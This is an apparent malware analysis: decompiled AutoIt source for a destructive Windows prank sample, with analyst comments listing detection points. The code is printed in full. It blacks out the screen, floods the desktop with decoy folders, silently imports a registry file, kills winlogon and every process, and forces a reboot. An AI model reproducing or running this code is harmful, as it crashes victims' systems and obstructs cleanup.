GLOBAL CONST $STARTF_USESHOWWINDOW = 1
GLOBAL CONST $STARTF_USESIZE = 2
GLOBAL CONST $STARTF_USESTDHANDLES = 256
GLOBAL CONST $CDDS_PREPAINT = 1
GLOBAL CONST $CDDS_POSTPAINT = 2
GLOBAL CONST $CDDS_PREERASE = 3
GLOBAL CONST $CDDS_POSTERASE = 4
GLOBAL CONST $CDDS_ITEM = 65536
GLOBAL CONST $CDDS_ITEMPREPAINT = 65537
GLOBAL CONST $CDDS_ITEMPOSTPAINT = 65538
GLOBAL CONST $CDDS_ITEMPREERASE = 65539
GLOBAL CONST $CDDS_ITEMPOSTERASE = 65540
GLOBAL CONST $CDDS_SUBITEM = 131072
GLOBAL CONST $CDIS_SELECTED = 1
GLOBAL CONST $CDIS_GRAYED = 2
GLOBAL CONST $CDIS_DISABLED = 4
GLOBAL CONST $CDIS_CHECKED = 8
GLOBAL CONST $CDIS_FOCUS = 16
GLOBAL CONST $CDIS_DEFAULT = 32
GLOBAL CONST $CDIS_HOT = 64
GLOBAL CONST $CDIS_MARKED = 128
GLOBAL CONST $CDIS_INDETERMINATE = 256
GLOBAL CONST $CDIS_SHOWKEYBOARDCUES = 512
GLOBAL CONST $CDIS_NEARHOT = 1024
GLOBAL CONST $CDIS_OTHERSIDEHOT = 2048
GLOBAL CONST $CDIS_DROPHILITED = 4096
GLOBAL CONST $CDRF_DODEFAULT = 0
GLOBAL CONST $CDRF_NEWFONT = 2
GLOBAL CONST $CDRF_SKIPDEFAULT = 4
GLOBAL CONST $CDRF_NOTIFYPOSTPAINT = 16
GLOBAL CONST $CDRF_NOTIFYITEMDRAW = 32
GLOBAL CONST $CDRF_NOTIFYSUBITEMDRAW = 32
GLOBAL CONST $CDRF_NOTIFYPOSTERASE = 64
GLOBAL CONST $CDRF_DOERASE = 8
GLOBAL CONST $CDRF_SKIPPOSTPAINT = 256
; Defined by the inlined include but not referenced anywhere in this listing.
GLOBAL CONST $GUI_SS_DEFAULT_GUI = BITOR ( $WS_MINIMIZEBOX , $WS_CAPTION , $WS_POPUP , $WS_SYSMENU )
; ===== Main body (analyst annotation) =====
; Execution order, as written: drop three embedded resources under %APPDATA%,
; cover the screen with a black full-screen window, flood the desktop with
; folders (_FORKDIR/_FUCKDIR below), set a policy wallpaper, silently import
; the dropped .reg file, terminate winlogon.exe and then every process, and
; force a reboot. Host-based detection points visible in this block:
;   - files named <8 random digits>.ico / .bmp / .reg appearing in %APPDATA%\
;   - HKCU\...\Policies\System\Wallpaper being written by a non-Explorer process
;   - cmd.exe (hidden) running "regedit /s", "ntsd -c q -pn winlogon.exe" and
;     "taskkill /f /fi "pid ge 1"" from a process started with elevation.
; NOTE(review): the quoting inside the RUN/RUNWAIT strings below looks mangled
; by the decompiler (doubled quotes are AutoIt's in-string escape); read them
; for intent, not as literal command lines.
$ICO = _MAKEDIR ( ".ico" )   ; %APPDATA%\<8 random digits>.ico (path only; see _MAKEDIR)
$BMP = _MAKEDIR ( ".bmp" )   ; %APPDATA%\<8 random digits>.bmp
$REG = _MAKEDIR ( ".reg" )   ; %APPDATA%\<8 random digits>.reg
; FileInstall extracts resources compiled into the executable; the three
; payload files ("Are you OK.*") are therefore embedded in the PE itself and
; can be recovered from it. Their contents are not shown on this page.
FILEINSTALL ( "Are you OK.ico" , $ICO )
FILEINSTALL ( "Are you OK.bmp" , $BMP )
FILEINSTALL ( "Are you OK.reg" , $REG )
; Desktop-sized, caption-less popup at (0,0) with a black background, shown
; before the flooding starts: the user sees only a black screen while the
; rest of the script runs. GUISETCURSOR(15) picks a built-in cursor id;
; which one is not verified here.
$FORM1 = GUICREATE ( "" , @DESKTOPWIDTH , @DESKTOPHEIGHT , 0 , 0 , BITOR ( $WS_SYSMENU , $WS_POPUP ) , BITOR ( $WS_EX_TOOLWINDOW , $WS_EX_WINDOWEDGE ) )
GUISETCURSOR ( 15 )
GUISETBKCOLOR ( 0 )
GUISETSTATE ( @SW_SHOW )
; Folder count scales with screen area: width*height/1000, e.g. a constructed
; 1920x1080 display gives 2073.6 -> the FOR loop in _FORKDIR runs 2073 times.
; Each iteration creates a randomly named folder directly on the desktop.
_FORKDIR ( @DESKTOPDIR & "\" , @DESKTOPWIDTH * @DESKTOPHEIGHT / 1000 )
; Policy wallpaper value (not the usual Control Panel\Desktop key) pointing at
; the dropped bitmap; persists after the sample itself is gone.
REGWRITE ( "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\" , "Wallpaper" , "REG_SZ" , $BMP )
; Silent import of the dropped .reg, then the file is deleted so the registry
; changes it made are not recoverable from disk; the .reg content would have
; to be pulled from the PE's FileInstall resource instead.
RUNWAIT ( "cmd.exe /c regedit /s "" & $REG & """ , @APPDATADIR & "\" , @SW_HIDE )
FILEDELETE ( $REG )
; Only when the legacy NT debugger is present (ntsd.exe ships with older
; Windows releases): attach to winlogon.exe and quit, which terminates it.
; Killing winlogon is what produces the blue screen described in the
; "危害" section; the ~2.3 s sleep gives it time to happen.
IF FILEEXISTS ( @SYSTEMDIR & "\ntsd.exe" ) THEN
RUN ( "cmd.exe /c "ntsd -c q -pn winlogon.exe"" , @SYSTEMDIR & "\" , @SW_HIDE )
SLEEP ( 2333 )
ENDIF
; Fallback / additional step: force-kill every process whose PID is >= 1,
; i.e. everything the elevated token can reach, then force a reboot.
; Shutdown(2 + 4) = reboot (2) + force (4) in AutoIt's Shutdown() flags.
RUN ( "cmd.exe /c "taskkill /f /fi "pid ge 1""" , @SYSTEMDIR & "\" , @SW_HIDE )
SLEEP ( 2333 )
SHUTDOWN ( 2 + 4 )
; _FORKDIR: create $NUM randomly named folders under $DIRT.
;   $DIRT - parent directory, passed with a trailing backslash by the caller.
;   $NUM  - number of folders; may be non-integer (caller passes an area/1000),
;           in which case the FOR loop runs Floor($NUM) times.
; Each folder path comes from _MAKEDIR with $FILE="\" so the random name is a
; directory (no extension); _FUCKDIR then creates and decorates it.
FUNC _FORKDIR ( $DIRT , $NUM )
FOR $I = 1 TO $NUM
$DIR = _MAKEDIR ( "\" , $DIRT )
_FUCKDIR ( $DIR )
NEXT
ENDFUNC
; _MAKEDIR: build a fresh, currently non-existent path of the form
;   $ROOT & <8-digit random integer> & $FILE
; Despite the name it creates nothing on disk; it only returns the path.
;   $FILE - suffix appended to the random number (an extension such as ".ico",
;           or "\" when the caller wants a directory path). Default "\".
;   $ROOT - directory prefix, expected to end with "\". The sentinel string
;           "null" (the default) means %APPDATA%\.
; Returns: the first candidate path for which FileExists() is False.
; The random component is RANDOM(10000000, 99999999, 1) — flag 1 asks for an
; integer — so every artifact this sample drops has an 8-digit numeric name,
; a useful pattern for file-system sweeps.
FUNC _MAKEDIR ( $FILE = "\" , $ROOT = "null" )
IF $ROOT = "null" THEN
$ROOT = @APPDATADIR & "\"
ENDIF
; Loop until a name that does not exist yet is found (collision avoidance
; only; no upper bound on attempts).
WHILE 1
$DIR = $ROOT & RANDOM ( 10000000 , 99999999 , 1 ) & $FILE
IF FILEEXISTS ( $DIR ) = FALSE THEN
EXITLOOP
ENDIF
WEND
RETURN $DIR
ENDFUNC
; _FUCKDIR: create one decoy folder and make Explorer display it with the
; dropped icon and the text "Are you OK?".
;   $DIR - full path of the folder to create (from _MAKEDIR, ends with "\").
; Artifacts left per folder: the folder itself (System attribute), a nested
; folder named "Are you OK...", and a Desktop.ini under $DIR. Together with
; the black full-screen window this is the "icons keep appearing" symptom
; described in the write-up. Global $ICO (the dropped .ico path) is read here.
FUNC _FUCKDIR ( $DIR )
DIRCREATE ( $DIR )
; Nested folder is created through cmd "md" rather than DirCreate; the name
; ends in dots, which Explorer normally refuses to create or delete —
; presumably chosen to make cleanup harder. (Quoting as printed looks
; decompiler-mangled; see note on the main body.)
RUNWAIT ( "cmd.exe /c md "Are you OK...\"" , $DIR , @SW_HIDE )
; Desktop.ini [.ShellClassInfo] entries: display name, icon, and tooltip.
INIWRITE ( $DIR & "\Desktop.ini" , ".ShellClassInfo" , "LocalizedResourceName" , "Are you OK?" )
INIWRITE ( $DIR & "\Desktop.ini" , ".ShellClassInfo" , "IconResource" , $ICO )
INIWRITE ( $DIR & "\Desktop.ini" , ".ShellClassInfo" , "InfoTip" , "Are you OK?" )
; NOTE: the path here differs from the INIWRITE path above ($DIR & "Desktop.ini"
; vs $DIR & "\Desktop.ini"); whether the +HS attribute lands on the written
; file depends on whether $DIR already ends with "\" — it does for callers
; going through _FORKDIR, so in practice the two paths coincide.
FILESETATTRIB ( $DIR & "Desktop.ini" , "+HS" )
; System attribute on the folder is what makes Explorer honour Desktop.ini.
FILESETATTRIB ( $DIR , "+S" )
ENDFUNC

危害:
运行后系统蓝屏、关机重启，并不断生成 ini 文件和图标。

